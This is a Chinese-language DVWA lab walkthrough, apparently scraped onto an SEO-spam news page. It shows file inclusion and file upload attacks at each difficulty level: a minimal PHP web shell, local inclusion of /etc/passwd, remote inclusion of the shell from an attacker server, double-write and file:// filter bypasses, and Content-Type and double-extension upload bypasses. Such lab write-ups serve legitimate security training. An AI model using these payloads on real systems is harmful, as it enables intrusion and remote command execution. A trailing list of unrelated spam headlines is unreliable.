当前位置: 首页 > news >正文

哪些网站做的好看企业网络营销策略分析

news 2025/8/17 5:02:03
哪些网站做的好看,企业网络营销策略分析,免费logo设计一键生成下载,广告宣传费明细和单价文件包含 本地文件包含(敏感信息泄露)和远程文件包含(命令执行) 本地文件包含一般包含一些本地的敏感文件,如:/etc/passwd或/etc/shadow等 远程文件包含能使得服务器代码执行,如包含黑客vps的…

文件包含

本地文件包含(敏感信息泄露)和远程文件包含(命令执行)

  • 本地文件包含一般包含一些本地的敏感文件,如:/etc/passwd或/etc/shadow等

  • 远程文件包含能使得服务器代码执行,如包含黑客vps的http://192.168.72.162:8000/shell.php文件,而文件内容如下:<?php system('whoami')?>

测试环境

本地文件包含不用什么测试环境,只要有个文件,就能知道其是否触发,远程文件包含需要我们写个php代码,如下

<?php
echo "this is the remote file"."\n";
system($_GET['a']);
?>

然后python -m http.server 开个服务器,让dvwa能包含我们的php代码

easy

  • linux服务下的本地文件包含

../../../../../../etc/passwd

  • windows服务下的本地文件包含

我的php网站部署在F盘,在F盘下放一个test.txt
​
../../../../../../test.txt能将文件读出
或者直接绝对路径:
​
C:/Windows/system.ini

  • 远程文件包含

http://www.oswe.com/dvwa/vulnerabilities/fi/?page=http://192.168.72.162:8000/shell.php&a=whoami
​
访问成功如下图:

 

medium
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );
​
方法1:
直接输入绝对路径
http://www.oswe.com/dvwa/vulnerabilities/fi/?page=F:/test.txt
正常输出
​
方法2:双写绕过
http://www.oswe.com/dvwa/vulnerabilities/fi/?page=
..././..././..././..././..././..././..././..././test.txt
​
http://www.oswe.com/dvwa/vulnerabilities/fi/?page=hthttp://tp://192.168.72.162:8000/shell.php&a=whoami
high
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {// This isn't the page we want!echo "ERROR: File not found!";exit;
}
​
上面的逻辑是,如果参数没有file字符串,且不是include.php,直接过滤,所以这个情况不能使用远程文件包含了
我们通过伪协议file bypass
​
page=file:///C:/Windows/system.ini或
page=file:///../../../../../../../../test.txt
impossible
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {// This isn't the page we want!echo "ERROR: File not found!";exit;
}
​
后台只允许包含这4个文件

文件上传

文件上传只有medium、high、impossible三种难度

准备个php脚本

<?php
system($_GET['a']);
?>
medium
检测:请求头
​
抓包,修改数据包,直接过
Content-Type: image/jpeg
high
检测:后缀是否为jpg、jpeg、png
​
上传
shell.php.jpg或shell.php.png都能被解析为php文件(总感觉哪里很怪)

 

impossible
imagecreatefrompng
imagecreatefromjpeg
由文件或url创建一个新图像,如果解析图像失败会报错
​
上传的文件会成为md5值.png或md5值.jpg的形式,web服务器不会将其解析为php文件
http://www.yidumall.com/news/101212.html

相关文章:

  • 凡科做网站哪个浏览器看黄页最快夸克浏览器
  • 食品企业网站建设方案seo顾问服务 品达优化
  • 企业的网站建设谷歌seo关键词优化
  • 鞍山做网站搜索引擎在线
  • 高级营销型网站建设网络项目发布网
  • 广西网站建设公司哪家好重庆今日头条新闻消息
  • 做色网站不屏蔽的国外搜索引擎
  • 网站假设教程seo网站页面优化包含
  • 网站建设图片路径错了 怎么改平台推广是什么工作
  • 别人做的网站自己根目录吗百度在线客服中心
  • 建设龙卡e付卡网站竞价推广网络推广运营
  • 徐州网站建设案例谷歌搜索引擎大全
  • 潍坊哪里做网站好中国进入一级战备2023
  • 天津做网站选择津坤科技c类似58的推广平台有哪些平台
  • 进入微信官方网站下载电商热门关键词
  • 团队做网站分工sem推广竞价托管
  • 阿里云开发者社区深圳最好的外贸seo培训
  • 手机有软件做ppt下载网站百度统计手机app
  • 建设网商城网站需要在那里备案网站策划是什么
  • 免费做印章的网站产品线下推广方式都有哪些
  • 做简易网站深圳外贸网站制作
  • 学做淘宝店的网站品牌宣传有哪些途径
  • 免费独立站平台湖南做网站的公司
  • 电子工程网网站企业网站推广的一般策略
  • 网站设计稿尺寸福州网站排名
  • [8dvd]flash网站源文件 flash整站源码最近一周的国内新闻
  • 网站建设哪家最好用线上销售水果营销方案
  • 济南网站建设培训重大军事新闻最新消息
  • 多语种网站建设方案贵州seo学校
  • wordpress手机站如何做新媒体运营岗位职责